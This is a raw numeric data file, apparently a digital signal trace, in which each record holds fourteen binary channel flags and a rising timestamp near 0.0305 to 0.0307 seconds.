1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0478000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0478024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0478052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0602820e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.0603012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603032e-02 0,0,0,1,1,0,0,0,0,0,0,1,0,1,3.0603064e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0603396e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603420e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0603444e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603468e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0603492e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603516e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0603540e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0603588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0603612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0603640e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603652e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603664e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603692e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603716e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603740e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603840e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603864e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603892e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603916e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0603964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0603988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604040e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604064e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604092e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604116e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604140e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604240e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604264e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604292e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604316e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604340e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604440e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604464e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604492e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604516e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604540e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604640e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604664e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604668e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0604716e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604740e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604748e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0604764e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0604788e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604796e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0604812e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604840e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0604864e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604892e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0604916e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604940e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0604964e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0604988e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0605012e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0605040e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0605092e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0605116e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605124e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605140e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605240e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605264e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605292e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605316e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605340e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605440e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605464e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605492e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605516e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0605520e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0605564e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0605588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605596e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605616e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605640e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605664e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605716e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605740e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605836e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605860e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605916e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0605940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0605964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606088e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606132e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606200e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0606208e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0606244e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0606268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606276e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606292e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606312e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606336e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606356e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606404e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606428e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606448e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606520e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606544e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606572e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606596e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606644e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606668e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606752e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606772e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606796e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606820e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606844e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606864e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606888e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606908e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606932e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0606956e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0606980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607000e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607092e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607120e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607144e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607172e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607196e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607220e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607244e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607320e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607344e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607368e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607396e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607520e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607568e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607592e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607644e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607668e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607720e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607740e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607768e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607792e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607820e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607844e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607868e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607892e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607916e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607940e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0607968e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0607992e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608092e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608116e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608140e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608168e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608192e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608220e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608244e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608320e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608344e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608372e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608396e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608500e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608524e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608544e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608572e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608596e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608648e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608672e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608700e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608724e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608748e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608772e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608796e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608820e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608848e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608872e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608900e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608924e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608948e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0608972e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0608996e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609048e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609072e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609100e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609124e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609148e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609172e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609200e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609224e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609276e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609300e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609324e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609348e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609372e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609400e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609424e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609452e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609476e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609500e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609524e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609548e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609572e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609600e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609624e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609652e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609676e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609700e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609724e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609748e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609772e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609800e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609828e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609852e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609876e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609900e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0609928e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0609948e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0734724e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0734904e-02 1,0,0,1,1,0,0,0,0,0,0,1,0,1,3.0734932e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0734964e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0735260e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0735292e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0735316e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0735340e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0735364e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0735388e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0735412e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0735436e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0735460e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0735488e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.0735512e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0735540e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735556e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735564e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735588e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735612e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735636e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735660e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735688e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735712e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735740e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735764e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735788e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735812e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735836e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735860e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735888e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735912e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735940e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0735964e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0735988e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736012e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736036e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736060e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736088e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736112e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736140e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736164e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736188e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736212e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736236e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736260e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736288e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736312e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736340e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736364e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736388e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736412e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736436e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736460e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736488e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736512e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0736540e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0736588e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0736612e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736636e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736660e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736688e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736712e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736764e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736788e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736836e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0736908e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736936e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0736940e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0736960e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0736984e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,3.0736992e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0736996e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737012e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737036e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737060e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737084e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737108e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737132e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737160e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737184e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737212e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737236e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737260e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737284e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737308e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737332e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737360e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737384e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0737388e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0737436e-02 